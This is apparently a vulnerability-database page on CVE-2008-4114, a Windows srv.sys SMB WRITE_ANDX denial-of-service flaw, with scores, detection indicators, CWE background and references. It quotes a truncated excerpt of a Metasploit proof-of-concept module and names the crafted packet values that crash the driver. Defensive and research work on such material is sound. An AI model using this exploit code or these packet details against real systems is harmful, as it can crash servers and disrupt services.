CVE-2008-4114
published 2008-09-16CVE-2008-4114: srv.sys in the Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows remote…
PriorityP347high7.1CVSS 2.0
AVNACMAuNCNINAC
EXPLOIT
EPSS
49.28%
98.7th percentile
srv.sys in the Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows remote attackers to cause a denial of service (system crash) or possibly have unspecified other impact via an SMB WRITE_ANDX packet with an offset that is inconsistent with the packet size, related to "insufficiently validating the buffer size," as demonstrated by a request to the \PIPE\lsarpc named pipe, aka "SMB Validation Denial of Service Vulnerability."
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | windows_vista | — | — |
| microsoft | windows_vista | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Monitor for SMB NT_CREATE_ANDX requests targeting the named pipe \PIPE\lsarpc immediately followed by a malformed WRITE_ANDX packet — this is the exact exploit sequence demonstrated in the PoC. ↗
- →Flag SMB packets containing the SMB signature bytes 0xcccccccc / 0xcccccccc (Signature1/Signature2) in the WRITE_ANDX request header — this is a PoC-specific artifact set in the exploit. ↗
- →Look for SMB WRITE_ANDX packets with AndXOffset set to 0xdede — this non-standard chained-command offset value is used in the exploit's crafted packets. ↗
- →Alert on crashes or unexpected unloads of the SRV.SYS kernel driver following inbound SMB traffic on port 445/139, as exploitation results in a system crash (BSOD). ↗
- ·The Metasploit PoC hardcodes SMB credentials (SMBUser/SMBPass = 'testuser') and domain/host ('COBAYA') — these are test-environment values and will not match real-world attacker configurations; do not rely on credential-matching for detection. ↗
- ·The Metasploit auxiliary module (ms09_001_write.rb) was tested successfully only against Windows Vista; behaviour and detectability may differ on other affected OS versions. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Microsoft Windows - 'WRITE_ANDX' SMB Command Handling Kernel Denial of Service (Metasploit)
exploitdb·2008-09-15
CVE-2008-4114 Microsoft Windows - 'WRITE_ANDX' SMB Command Handling Kernel Denial of Service (Metasploit)
Microsoft Windows - 'WRITE_ANDX' SMB Command Handling Kernel Denial of Service (Metasploit)
---
require 'msf/core'
module Msf
module Exploits
module Test
class BugTest 'test exploit',
'Description' =>
"tests",
'Author' => 'tests',
'License' => MSF_LICENSE,
'Version' => '$Revision: 0 $',
'Arch' => 'x86',
'Payload' =>
{
'Space' => 1000
},
'Targets' =>
[
[
'Windows VISTA',
{
'Platform' => 'win'
}
],
],
'DefaultTarget' => 0))
end
def subexploit(dlenlow, doffset,fillersize)
print_line("1")
datastore['SMBUser']='testuser'
datastore['SMBPass']='testuser'
datastore['SMBDomain']='COBAYA'
datastore['SMBName']='COBAYA'
print_line("2")
connect()
print_line("3")
smb_login()
print_line("4")
pkt = CONST::SMB_CREATE_PKT.make_struct
pkt['Payload']['SMB'].v['Flags1'] = 0x18
pkt['Payload']['S
Metasploit
Microsoft SRV.SYS WriteAndX Invalid DataOffset
metasploit
Microsoft SRV.SYS WriteAndX Invalid DataOffset
Microsoft SRV.SYS WriteAndX Invalid DataOffset
This module exploits a denial of service vulnerability in the SRV.SYS driver of the Windows operating system. This module has been tested successfully against Windows Vista.
No writeups or analysis indexed.
CWE
Improper Input Validation
mitre_cwe
CWE-20 Improper Input Validation
CWE-20: Improper Input Validation
The product receives input or data, but it does
not validate or incorrectly validates that the input has the
properties that are required to process the data safely and
correctly.
Input validation is a frequently-used technique
for checking potentially dangerous inputs in order to
ensure that the inputs are safe for processing within the
code, or when communicating with other components. Input can consist of: raw data - strings, numbers, parameters, file contents, etc. metadata - information about the raw data, such as headers or size Data can be simple or structured. Structured data
can be composed of many nested layers, composed of
combinations of metadata and raw data, with other simple or
structured data. Many properties of raw data or metadata may n
CWE
Improper Validation of Consistency within Input
mitre_cwe·CVSS 7.5
[HIGH] CWE-1288 Improper Validation of Consistency within Input
CWE-1288: Improper Validation of Consistency within Input
The product receives a complex input with multiple elements or fields that must be consistent with each other, but it does not validate or incorrectly validates that the input is actually consistent.
Some input data can be structured with multiple elements or fields that must be consistent with each other, e.g. a number-of-items field that is followed by the expected number of elements. When such complex inputs are inconsistent, attackers could trigger unexpected errors, cause incorrect actions to take place, or exploit latent vulnerabilities.
Modes of Introduction:
Phase: Implementation
Common Consequences:
Scope: Other. Impact: Varies by Context.
Potential Mitigations:
[Implementation] Assume all input is malicious. Use an "a
CWE
Use of Out-of-range Pointer Offset
mitre_cwe
CWE-823 Use of Out-of-range Pointer Offset
CWE-823: Use of Out-of-range Pointer Offset
The product performs pointer arithmetic on a valid pointer, but it uses an offset that can point outside of the intended range of valid memory locations for the resulting pointer.
While a pointer can contain a reference to any arbitrary memory location, a program typically only intends to use the pointer to access limited portions of memory, such as contiguous memory used to access an individual array. Programs may use offsets in order to access fields or sub-elements stored within structured data. The offset might be out-of-range if it comes from an untrusted source, is the result of an incorrect calculation, or occurs because of another error. If an attacker can control or influence the offset so that it points outside of the intended boundar
http://secunia.com/advisories/31883http://www.reversemode.com/index.php?option=com_content&task=view&id=54&Itemid=1http://www.securityfocus.com/archive/1/496354/100/0/threadedhttp://www.securityfocus.com/bid/31179http://www.securitytracker.com/id?1020887http://www.us-cert.gov/cas/techalerts/TA09-013A.htmlhttp://www.vallejo.cc/proyectos/vista_SMB_write_DoS.htmhttp://www.vupen.com/english/advisories/2008/2583https://docs.microsoft.com/en-us/security-updates/securitybulletins/2009/ms09-001https://exchange.xforce.ibmcloud.com/vulnerabilities/45146https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A5262https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A6044https://www.exploit-db.com/exploits/6463http://secunia.com/advisories/31883http://www.reversemode.com/index.php?option=com_content&task=view&id=54&Itemid=1http://www.securityfocus.com/archive/1/496354/100/0/threadedhttp://www.securityfocus.com/bid/31179http://www.securitytracker.com/id?1020887http://www.us-cert.gov/cas/techalerts/TA09-013A.htmlhttp://www.vallejo.cc/proyectos/vista_SMB_write_DoS.htmhttp://www.vupen.com/english/advisories/2008/2583https://docs.microsoft.com/en-us/security-updates/securitybulletins/2009/ms09-001https://exchange.xforce.ibmcloud.com/vulnerabilities/45146https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A5262https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A6044https://www.exploit-db.com/exploits/6463
2008-09-16
Published